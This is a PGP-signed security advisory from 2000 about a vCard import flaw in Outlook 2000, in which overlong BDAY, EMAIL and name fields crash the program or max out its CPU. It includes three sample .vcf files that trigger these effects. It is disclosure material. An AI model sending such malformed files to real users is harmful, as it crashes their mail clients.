[ SOURCE: http://www.secureroot.com/security/advisories/9678232530.html ]

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



Vulnerability in vCard import in Outlook 2000

Released: August 30, 2000



Summary

=======



Under certain conditions, excessively long or malformed fields in a

vCard (.vcf) file can  cause Microsoft Outlook 2000 to either

overflow or excessively utilize system resources.





Background

==========



The specifications regarding vCard MIME types and field contents can

be found in RFCs 2425  and 2426.



Although RFC 2426 section 2.6 specifically requires lines longer than

75 characters to be  folded as defined in [MIME-DIR], it appears

Outlook does not support line folding, and will  attempt to import

any field in the file as one value, even if it is several pages long

or  (in one case) overflows a data field within Outlook.



The effect this unlimited import attempt has on Outlook 2000 varies

between field types.  Some fields will cause Outlook to consume

nearly all CPU time, and certain others  (especially date/revision

fields and e-mail fields) will cause Outlook to terminiate

immediately due to an overflow.





Severity

========



Outlook 2000 does not attempt to open and import a .vcf file that a

user receives via e-mail  without prompting the user first. However,

vCard files are extremely common, and many users  have trained

themselves to ignore the warning dialog box.



Outlook does, however, open a vCard file with no questions asked if

the user saves it to a  directory and double-clicks it from Windows

Explorer. In this situation, the vCard is  processed directly with no

warning or status messages displayed to the user.





Affected Configurations

=======================



Microsoft Outlook 2000 was the only platform tested (on Windows NT

4.0 Workstation,

Service Pack 6a+hotfixes).



Affected fields in vCard file causing an overflow:



- - email:

- - bday; value=date (as low as 52 characters of form YYYY-MM-D(60)



Affected fields in vCard file causing excessive CPU utilization:



- - name:

- - nickname:

- - fn:

- - title:

- - title;language=de;value=text:

- - tel:

- - tel;<label>:

- - tel;<label>,<label>:



Fields which do not appear to be affected:



- - note:



Fields which do not appear to be supported:



- - any fields which continue on the next line or have defined newlines

  per RFC-2425

- - key:

- - o:



No other fields were tested.





Examples

========



The following examples will cause the advertised behavior.



1) A modification of the "bday" field to extend beyond 55 characters.

This example appears  to be the smallest amount of text required to

elicit the symptom. This example will cause  Outlook 2000 to overflow

and terminate.



BEGIN:VCARD

VERSION:2.1

N:Berger;Meister

FN:Meister Berger

NICKNAME:Sadf

ORG:Test;e3425454

TITLE:Burgermeister

NOTE:The Mayor of the great city of Goerlitz in the great country of

Germany.

TEL;WORK;VOICE:(873) 323-3213

TEL;HOME;VOICE:(873) 323-3213

TEL;CELL;VOICE:(873) 323-3213

TEL;VOICE:+49 3581 1234

TEL;WORK;FAX:(873) 323-3213

ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United

States of America

LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423

efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=

s of America

URL:

URL:http://bin.false/

ROLE:sadf

BDAY:19630915130848273492749723947923749273942394792734972394729374927

4982739472937492873

EMAIL;PREF;INTERNET:mb@goerlitz.de

REV:20000830T191121Z

END:VCARD



2) A modification of the "e-mail" field with a large amount of text

data masquerading as an  e-mail address. This example will cause

Outlook 2000 to overflow and terminate.





BEGIN:VCARD

VERSION:2.1

N:Berger;Meister

FN:Meister Berger

NICKNAME:Sadf

ORG:Test;e3425454

TITLE:Burgermeister

NOTE:The Mayor of the great city of Goerlitz in the great country of

Germany.

TEL;WORK;VOICE:(873) 323-3213

TEL;HOME;VOICE:(873) 323-3213

TEL;CELL;VOICE:(873) 323-3213

TEL;VOICE:+49 3581 1234

TEL;WORK;FAX:(873) 323-3213

ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United

States of America

LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423

efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=

s of America

URL:

URL:http://bin.false/

ROLE:sadf

BDAY:19630915

EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo

.possible.sadsack.not hing.doing.is.an.overflow.possible.



<content clipped for brevity - envision lots of text here>



.sadsack.nothing.doing.is.an.overflow.possible.com

REV:20000830T191121Z

END:VCARD



3) A modification of the "N" or "name" field with a large amount of

text will not cause  Outlook to terminate, but will increase

Outlook's CPU utilization to 99%.



BEGIN:VCARD

VERSION:2.1

N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger

MeisterBerger Meister



<content clipped for brevity - envision lots of text here>



Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger

MeisterBerger MeisterBerger  MeisterBerger Meister

FN:Meister Berger

NICKNAME:Sadf

ORG:Test;e3425454

TITLE:Burgermeister

NOTE:The Mayor of the great city of Goerlitz in the great country of

Germany.

TEL;WORK;VOICE:(873) 323-3213

TEL;HOME;VOICE:(873) 323-3213

TEL;CELL;VOICE:(873) 323-3213

TEL;VOICE:+49 3581 1234

TEL;WORK;FAX:(873) 323-3213

ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United

States of America

LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423

efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=

s of America

URL:

URL:http://bin.false/

ROLE:sadf

BDAY:19630915

EMAIL;PREF;INTERNET:mb@goerlitz.de

REV:20000830T191121Z

END:VCARD





Resolution

==========



None at present, other than to disassociate the .vcf extension from

Outlook. There may be  more fields affected -- these are merely the

initially tested ones.



-----BEGIN PGP SIGNATURE-----

Version: PGP Personal Privacy 6.5.1



iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO

LSZIBp6xoMPl4Tc5unZeICka

=N+p4

-----END PGP SIGNATURE-----